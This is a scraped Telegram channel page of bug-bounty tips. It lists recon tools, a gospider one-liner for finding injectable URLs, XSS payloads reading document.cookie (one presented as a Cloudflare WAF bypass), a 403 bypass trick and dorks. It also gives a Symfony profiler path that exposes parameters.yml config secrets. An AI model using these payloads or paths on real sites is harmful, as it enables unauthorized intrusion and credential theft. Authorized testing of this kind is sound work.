Termux All Command [Telegram Group]
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Більше603
Підписники
+324 години
+137 днів
+2330 днів
- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Приріст підписників
Триває завантаження даних...
🕵️Best Reconnaissance Tools
✅ Amass - Sub Enumeration
✅ Subfinder - Sub Enumeration
✅ MassDNS - DNS Resolution
✅ Subjack - Subdomain Takeover Detection
✅ Masscan - Port Scan
✅ Nmap - Network Scan
✅ SearchSploit - Vuln. Search
✅ Aquatone - Sub Screenshot
hashtag#bygbounty
00:05
Відео недоступнеДивитись в Telegram
Advanced One-Liner for extracting filtered URLs for Injection-Based Attacks.
gospider -s 'URL TARGET' -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | gf allparam | sed 's/=./=/' | grep -Eo '(http|https)://[^&]+' | awk '!seen[$0]++' | grep '^URL TARGET'
1720608998445.gif.mp40.21 KB
Try this mass Wordlist for directory bruteforcing ;)
https://github.com/six2dez/OneListForAll
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
My four XSS vulnerability reports were triaged.
I reported them to a single program on HackerOne.
Tips:
* if you were able to find a vulnerable parameter try to dork for it in a different assets, google dorks used:
site:*.target.com inurl:"?name="
and site:*.target.com inurl:"?type="
* If you come across a sub-domain that says "You do not have permission to view this directory or page":
https://sub.target[.]com/ --> 403 (Forbidden)
https://sub.target[.]com/%3f/ --> 200 (OK)
Payload Used: </div><img src="x" onerror="alert(document.cookie)"/><div><p>
Top technical skills for penetration tester specialists
● Nmap
● Kali Linux
● BackTrack
● SamuraiWTF
● Parrot
● Metasploit
● Kismet
● THC Hydra
● soapUI
● AppScan
● ZAP
● SOOS
● Canvas
● QualysGuard
● ArcSight
● Splunk
● Archer
● Nessus
● Nmap
● Nikto
● Wireshark
● WebInspect
● Netsparker
● Fortify
● Ounce Labs
● Acunetix
● SQLmap
● SAST
● DAST
● Social-Engineer Toolkit
● Objective-C
● Java
● C#
● C
● C++
● Python
● SQL
● ASP.NET
● PHP
● JavaScript
● Bash
● Ruby
● REST
● Powershell
● XML
● YAML
● JSON
● Protocols: FTP/POP3/IMAP/SMB/SSH
● TCP/IP
● Windows/iOS/Android/Linux/Unix
● Firewalls
● Networks
● Servers
● Cloud Infrastructures
● CI/CD
● Keyloggers
● Cryptography
● IDS/IPS
● Technical writing
● Hardware
● OSI layer model
connect for more post- https://linktr.ee/Harshleen_Chawla
Harshleen_Chawla | Twitter | Linktree
Linktree. Make your link do more.
CloudFlare XSS protection WAF Bypassed !
payload used:
<Img Src=OnXSS OnError=confirm(document.cookie)>
#bugbounty #infosec
🐞 Bug Bounty Tip: 🕵️♂️
If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data. Enjoy! 🚀
#bugbountytips #bugbountytip #cybersecurity #ethicalhacking
Оберіть інший тариф
На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.